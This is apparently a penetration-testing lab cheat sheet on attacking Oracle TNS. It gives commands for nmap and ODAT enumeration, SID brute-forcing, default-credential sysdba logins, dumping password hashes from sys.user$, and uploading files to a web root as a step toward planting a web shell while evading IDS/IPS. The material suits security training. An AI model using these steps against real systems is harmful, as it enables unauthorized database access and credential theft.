Oracle TNS
Table of Contents
- ODAT (Oracle Database Attacking Tool)
- SID Bruteforcing
- Use SQLplus to Interact with the Oracle Database
- Oracle Transparent Network Substrate General Information
Default: TCP/1521 port
nmap -> sudo nmap -p1521 -sV 10.129.204.235 --open
The Oracle DBSNMP service default password - dbsnmp
setup oracle tools -> /payload_executable/Oracle-Tools-setup.sh
ODAT (Oracle Database Attacking Tool)
> ./odat/odat.py -h
- retrieve database names, versions, running processes, user accounts, vulnerabilities, misconfigurations, etc
> ./odat/odat.py all -s 10.129.204.235
SID Bruteforcing
- System Identifier (
SID) is a unique identifier of a db instance in Oracle RDBMS - uses this SID to identify which database instance to connect
- If SID is not specified, the default value defined in the
tnsnames.orafile is used
nmap SID bruteforcing -> sudo nmap -p1521 -sV 10.129.204.235 --open --script oracle-sid-brute
Use SQLplus to Interact with the Oracle Database
> sqlplus username/password@ip/SID
If you come across the following error sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory, please execute the below
> sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig
list all tables
SQL> select table_name from all_tables;
attempt to login as system database admin
SQL> sqlplus scott/tiger@10.129.204.235/XE as sysdba
extract password hashes
SQL> select name, password from sys.user$;
upload web shell in default paths if a web server is present
| OS | Path |
|---|---|
| Linux | /var/www/html |
| Windows | C:\inetpub\wwwroot |
| To be safe and evade IDS/IPS, see if can upload a text file: |
> echo "Oracle File Upload Test" > testing.txt
> ./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt
[1] (10.129.204.235:1521): Put the ./testing.txt local file in the C:\inetpub\wwwroot folder like testing.txt on the 10.129.204.235 server
[+] The ./testing.txt file was created on the C:\inetpub\wwwroot directory on the 10.129.204.235 server like the testing.txt file
use curl to make sure
> curl -X GET http://10.129.204.235/testing.txt
Oracle Transparent Network Substrate General Information
- facilitates communication between Oracle databases and applications
- The configuration files for Oracle TNS are called
tnsnames.oraandlistener.oraand are typically located in the$ORACLE_HOME/network/admindirectory. The plain text file contains configuration information for Oracle database instances and other network services that use the TNS protocol.